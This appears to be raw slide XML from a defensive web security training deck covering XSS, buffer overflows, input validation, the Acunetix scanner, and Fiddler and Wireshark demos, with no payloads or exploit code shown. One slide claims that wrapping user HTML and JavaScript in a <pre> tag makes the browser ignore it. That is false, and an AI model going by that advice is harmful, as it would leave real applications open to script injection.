          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12591"/>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4189343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XSS?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>other user’s cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>their private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>erforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>actions on behalf of other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>edirecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Showing ads in hidden IFRAMES and pop-ups  </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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41546327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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ypothesis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bugs come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>arise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>interactions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>between the software and its environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>during operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the software's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>human </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other cohabitating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and interoperating software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="http://bugshieldsbydino.com/Bug%20Drawn%20Pictures/bug%20alone.gif"/>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772564" y="3726625"/>
            <a:ext cx="1431925" cy="1333501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="1016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3663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Preventing XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>alidate all input data from the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never show data entered by the user without cleaning them from JavaScript and HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If showing HTML and JavaScript from the user is needed – use the &lt;pre&gt; tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The browser will ignore entered code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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="http://www.frameloss.org/wp-content/uploads/2008/08/noscript.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705600" y="4800600"/>
            <a:ext cx="1600200" cy="1600202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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063714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071418" y="4257963"/>
            <a:ext cx="7296727" cy="1715655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="http://msmvps.com/cfs-file.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/alunj.metablogapi/2146.image_5F00_thumb_5F00_1F1803B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7025" y="1800946"/>
            <a:ext cx="3409950" cy="1809751"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12122"/>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84016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Golden Rule 4. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incorrect Until Proven Correct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider each user input as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>incorrect until proven correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never accept user input without complete validation</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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="http://www.novini.bg/uploads/news_pictures/2011-25/big/napadnaha-temida-8158.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857500" y="4038600"/>
            <a:ext cx="3429000" cy="1926663"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6"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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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811673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Acunetix Vulnerability Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acunetix WVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.acunetix.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your web applications for XSS, SQL Injection &amp; other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free demo version with limited functionality available (XSS checks only)</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338"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722091" y="3844046"/>
            <a:ext cx="3810000" cy="2861554"/>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73779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062182" y="4368799"/>
            <a:ext cx="7296727" cy="1715655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FAF7C8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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ackgroundRemoval t="508" b="100000" l="0" r="100000">
                        <a14:foregroundMark x1="45703" y1="66497" x2="45703" y2="66497"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1835005"/>
            <a:ext cx="2438400" cy="1876425"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350234289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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflow </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is buffer overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overrun</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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="http://www.tectonic.co.za/wordpress/wp-content/uploads/2009/03/bufferoverflow.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162300" y="4191000"/>
            <a:ext cx="2819400" cy="1973580"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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931853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Buffer Overflow - The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sual Victims</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>uffer overflow is commonly associated with C and C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>no built-in protection against accessing or overwriting data</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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146"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04800" y="3704823"/>
            <a:ext cx="3048000" cy="2438400"/>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6" name="Picture 2"/>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ackgroundRemoval t="0" b="100000" l="0" r="98077"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3771900" y="3594099"/>
            <a:ext cx="4953000" cy="2679701"/>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74329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Preventing Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choice of programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Address space layout randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Deep packet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>inspection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234304864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6182" y="5224249"/>
            <a:ext cx="7667625" cy="753017"/>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le 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="914400"/>
            <a:ext cx="4800600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" bIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="5000" b="1" kern="1200" cap="none" baseline="0">
                <a:ln w="500">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11269" name="Picture 5" descr="Fiddler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109894">
            <a:off x="457200" y="2514600"/>
            <a:ext cx="5920048" cy="1795249"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6352972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71700" y="2524125"/>
            <a:ext cx="4800600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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920673" y="4043361"/>
            <a:ext cx="2857500" cy="1609725"/>
          </a:xfrm>
